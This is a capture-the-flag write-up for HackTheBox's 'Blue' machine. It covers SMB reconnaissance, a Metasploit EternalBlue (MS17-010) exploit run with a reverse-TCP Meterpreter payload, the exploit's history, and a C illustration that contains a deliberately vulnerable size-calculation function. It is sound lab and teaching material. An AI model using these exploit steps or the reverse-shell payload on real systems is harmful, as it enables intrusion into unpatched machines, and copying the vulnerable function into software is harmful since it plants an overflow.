
Blue

Known as the easiest machine on HackTheBox, Blue should not be overlooked. It shows how damaging a missing patch can be, and how quickly an attacker can gain the highest privilege on a machine, in minutes.

Write Up

Setup

First, setup and organize your environment. In my opinion, organization is the most important skill to master. Here is how I always start a new machine:

$ cd hackthebox
$ mkdir blue
$ mkdir blue/nmap blue/www blue/gobuster
$ cd blue

Reconnaissance

Run an nmap scan using the standard options:

$ nmap -sC -sV 10.10.10.40 -oA nmap/blue
# Nmap 7.91 scan initiated Sun Apr 11 02:47:40 2021 as: nmap -sC -sV -v -oA nmap/blue 10.10.10.40
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.085s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -15m21s, deviation: 34m36s, median: 4m36s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-11T07:53:25+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-11T06:53:23
|_ start_date: 2021-04-10T20:13:09

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 11 02:48:54 2021 -- 1 IP address (1 host up) scanned in 74.51 seconds

We can see from the nmap scan that smb-security-mode reports guest access (account_used: guest), so let's test that out:

$ smbclient -L blue.htb
Enter SMB2\kali's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
SMB1 disabled -- no workgroup available

We can connect to both the Users and Share shares with the following commands, although this is unnecessary for completing the box:

$ smbclient //blue.htb/Users
$ smbclient //blue.htb/Share

Let's look into the Windows version and see if there is a vulnerability. Googling "Windows 7 Professional 7601 Service Pack 1" (which we got from the nmap scan), the first result is an exploit for 'Eternal Blue'.

Eternal Blue is a fascinating exploit. It was developed by the NSA and leaked by the Shadow Brokers in 2017. Following its release, it has had a wild and violent record: it was used in 2017 by WannaCry and NotPetya, both of which had devastating consequences across the world. Read more in the Beyond the Box section below.

Exploitation

Let's look for a public exploit, then find a module we can use in Metasploit:

$ searchsploit eternalblue
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py

In Metasploit, configure the exploit:

msf6 > use windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST blue.htb
RHOST => blue.htb
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.40 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

The exploit might take a couple of tries to complete. When it does, you will have a shell with the highest privilege on the machine.

The user flag is at C:\Users\haris\user.txt. The root flag is at C:\Users\Administrators\root.txt.

Beyond the Box

History

Eternal Blue (officially named MS17-010 by Microsoft) is an exploit created by the National Security Agency which targets Microsoft Server Message Block 1.0 (SMBv1). In severe cases, it allows remote code execution.

The exploit was leaked in 2017 by the Shadow Brokers, a hacker group which emerged the previous year. While the origins of the group remain unknown, they are speculated to be part of a larger Russian campaign.

Following the leak, Eternal Blue was used in both the WannaCry and NotPetya cyberattacks in 2017, both of which had devastating effects across the world, most notably in Ukraine. The attack is speculated to be a consequence of the 2014 Russian annexation of Crimea.

As a result, Brad Smith, president of Microsoft, wrote in a 2017 blog post titled "The need for urgent collective action to keep people safe online: Lessons from last week’s cyberattack" on the Microsoft website:

We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage. An equivalent scenario with conventional weapons would be the U.S. military having some of its Tomahawk missiles stolen. And this most recent attack represents a completely unintended but disconcerting link between the two most serious forms of cybersecurity threats in the world today – nation-state action and organized criminal action.

Microsoft released a patch for vulnerable systems on March 14, 2017.

Read the Wikipedia entry here.

The Exploit

We used the Metasploit module exploit/windows/smb/ms17_010_eternalblue. The description for that module is:

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers.

There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete.

This exploit, like the original, may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead.

On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

You can find the source code for the exploit here.

For all its complexity, an exploit that no doubt required many hours of research comes down to one of the most fundamental exploit techniques: a buffer overflow.
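The module description above attributes the overflow to a size calculation that stores a DWORD result through a WORD. The following is an added illustration of that bug class, not the Windows SMB driver's code or the module's: a simplified FEA-list sizer in which the vulnerable path rewrites only the low 16 bits of a client-supplied 32-bit count, so the count the later copy trusts stays larger than the buffer sized from the function's return value, beside a hardened version that stores the full width. The struct layout, field names and sample entry are assumptions constructed for the example.

```c
#include <stdint.h>
/* Simplified model (added illustration, not the Windows SMB driver's code) of the
 * size error described above: cb_list is a client-supplied 32-bit DWORD, but the
 * recomputed size is stored back through a 16-bit WORD. */
typedef struct {
    uint32_t cb_list;        /* client-supplied byte count, 4-byte header included */
    uint32_t avail;          /* bytes that actually arrived, header included */
    const uint8_t *entries;  /* entry bytes after the header */
} fea_list;

/* Entry layout: flags(1), name length(1), value length(2, little endian), then data. */
static uint32_t entry_size(const uint8_t *e) {
    return 4u + e[1] + (uint32_t)(e[2] | (e[3] << 8));
}

/* Count whole entries that fit within both cb_list and the bytes received. */
static uint32_t walk_entries(const fea_list *l) {
    uint32_t off = 4;
    while (off + 4 <= l->cb_list && off + 4 <= l->avail) {
        uint32_t sz = entry_size(l->entries + (off - 4));
        if (off + sz > l->cb_list || off + sz > l->avail) break;
        off += sz;
    }
    return off;
}

/* VULNERABLE: only the low WORD of cb_list is rewritten, so a cb_list above 0xFFFF
 * keeps its stale high half, and a later copy driven by cb_list runs past a
 * buffer sized from the returned value. */
uint32_t list_size_vulnerable(fea_list *l) {
    uint32_t used = walk_entries(l);
    l->cb_list = (l->cb_list & 0xFFFF0000u) | (used & 0xFFFFu);  /* WORD-wide store */
    return used;
}

/* HARDENED: full-width store, so cb_list and the returned size always agree. */
uint32_t list_size_hardened(fea_list *l) {
    uint32_t used = walk_entries(l);
    l->cb_list = used;
    return used;
}

/* Constructed sample: one 8-byte entry received (12 bytes with header) while
 * cb_list claims 0x1000C = 65548 bytes. Returns cb_list after the chosen path. */
static const uint8_t sample_entry[8] = { 0, 0, 4, 0, 'a', 'b', 'c', 'd' };
uint32_t demo_cb_list_after(int hardened) {
    fea_list l = { 0x1000Cu, 12, sample_entry };
    if (hardened) list_size_hardened(&l); else list_size_vulnerable(&l);
    return l.cb_list;  /* 65548 when vulnerable, 12 when hardened */
}
```

The defensive takeaway is that any length recomputed during validation must be stored at the same width it is later read at; a mismatched store leaves the attacker-controlled value in charge of the copy.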